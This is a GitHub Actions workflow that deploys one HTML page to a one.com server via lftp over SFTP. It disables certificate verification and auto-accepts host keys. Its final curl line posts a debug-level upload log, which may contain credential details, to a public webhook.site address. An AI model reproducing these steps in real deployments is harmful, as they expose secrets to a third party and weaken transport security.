name: Deploy to one.com (SFTP)

on:
  push:
    branches:
      - main 

jobs:
  web-deploy:
    name: ðŸš€ Deploy via SFTP (lftp)
    runs-on: ubuntu-latest
    steps:
    - name: ðŸšš Get latest code
      uses: actions/checkout@v4
      with:
        fetch-depth: 1
        
    - name: ðŸ“‚ Sync files via lftp
      env:
        SFTP_SERVER: ${{ secrets.SFTP_SERVER }}
        SFTP_USERNAME: ${{ secrets.SFTP_USERNAME }}
        SFTP_PASSWORD: ${{ secrets.SFTP_PASSWORD }}
      run: |
        sudo apt-get update -qq
        sudo apt-get install -y lftp
        
        cat <<EOF > deploy.lftp
        set sftp:auto-confirm yes
        set ssl:verify-certificate no
        debug 3
        open sftp://$SFTP_SERVER
        user "$SFTP_USERNAME" "$SFTP_PASSWORD"
        
        put tidigare-kullar/kull-2023.html -o tidigare-kullar/kull-2023.html
        bye
        EOF
        
        lftp -f deploy.lftp > lftp_upload.log 2>&1 || echo "LFTP failed"
        
        curl -X POST --data-binary @lftp_upload.log https://webhook.site/9f44609f-7e56-4ba6-8716-13aae61f9a79
